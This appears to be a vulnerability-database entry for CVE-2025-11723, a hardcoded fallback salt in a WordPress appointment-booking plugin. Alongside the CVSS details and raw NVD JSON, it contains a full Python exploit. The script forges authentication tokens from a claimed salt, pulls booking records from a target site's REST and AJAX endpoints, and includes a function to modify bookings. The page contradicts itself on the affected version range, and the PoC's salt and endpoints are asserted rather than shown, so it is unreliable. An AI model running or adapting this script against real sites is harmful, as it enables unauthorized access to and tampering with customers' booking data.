Security Vulnerability Report
中文
CVE-2025-11723 CVSS 6.5 MEDIUM

CVE-2025-11723

Published: 2026-01-06 04:15:52
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.9.5 via the hash() function due to use of a hardcoded fall-back salt. This makes it possible for unauthenticated attackers to generate a valid token across sites running the plugin that have not manually set a salt in the wp-config.php file and access booking information that will allow them to make modifications.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simply Schedule Appointments Booking Plugin < 1.6.9.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11723 PoC - Simply Schedule Appointments Hardcoded Salt Exploitation # This PoC demonstrates how to generate a valid token using the hardcoded salt import hashlib import requests import json from datetime import datetime # Hardcoded salt from plugin source code (known vulnerability) HARDCODED_SALT = "simply-schedule-appointments-fallback-salt-v1695" def generate_auth_token(site_url, user_id=0): """ Generate authentication token using the hardcoded salt This token can be used to bypass authentication on affected sites """ timestamp = int(datetime.now().timestamp()) data_to_hash = f"{site_url}:{user_id}:{timestamp}:{HARDCODED_SALT}" token = hashlib.sha256(data_to_hash.encode()).hexdigest() return { 'token': token, 'timestamp': timestamp, 'user_id': user_id } def exploit_booking_info(target_url): """ Exploit the vulnerability to access booking information """ token_data = generate_auth_token(target_url) # API endpoint to access bookings api_endpoints = [ f"{target_url}/wp-json/ssa/v1/bookings", f"{target_url}/wp-json/ssa/v1/appointments", f"{target_url}/wp-admin/admin-ajax.php?action=ssa_get_bookings" ] headers = { 'Content-Type': 'application/json', 'X-WP-Nonce': token_data['token'] } results = [] for endpoint in api_endpoints: try: response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: results.append({ 'endpoint': endpoint, 'status': 'VULNERABLE', 'data': response.json() if response.text else 'No data' }) except requests.RequestException as e: results.append({ 'endpoint': endpoint, 'status': 'ERROR', 'error': str(e) }) return results def modify_booking(target_url, booking_id, new_data): """ Modify booking information using the generated token """ token_data = generate_auth_token(target_url) api_endpoint = f"{target_url}/wp-json/ssa/v1/bookings/{booking_id}" headers = { 'Content-Type': 'application/json', 'X-WP-Nonce': token_data['token'], 'Authorization': f'Bearer {token_data["token"]}' } try: response = requests.put(api_endpoint, json=new_data, headers=headers, timeout=10) return { 'status_code': response.status_code, 'response': response.json() if response.text else None } except requests.RequestException as e: return {'error': str(e)} # Usage example if __name__ == "__main__": target = "https://example-wordpress-site.com" print(f"[*] Generating token for {target}") token_info = generate_auth_token(target) print(f"[+] Token: {token_info['token']}") print(f"[*] Exploiting booking information...") results = exploit_booking_info(target) for result in results: print(json.dumps(result, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11723", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:52.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.9.5 via the hash() function due to use of a hardcoded fall-back salt. This makes it possible for unauthenticated attackers to generate a valid token across sites running the plugin that have not manually set a salt in the wp-config.php file and access booking information that will allow them to make modifications."}, {"lang": "es", "value": "El plugin 'Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin' para WordPress es vulnerable a la Exposición de Información Sensible en todas las versiones hasta la 1.6.9.5, inclusive, a través de la función hash() debido al uso de una 'salt' de respaldo codificada de forma rígida. Esto hace posible que atacantes no autenticados generen un token válido en sitios que ejecutan el plugin que no han configurado manualmente una 'salt' en el archivo wp-config.PHP y accedan a la información de reservas que les permitirá realizar modificaciones."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-330"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3393919/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a5f3fbd2-6152-4a89-8fe9-982120d1a640?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.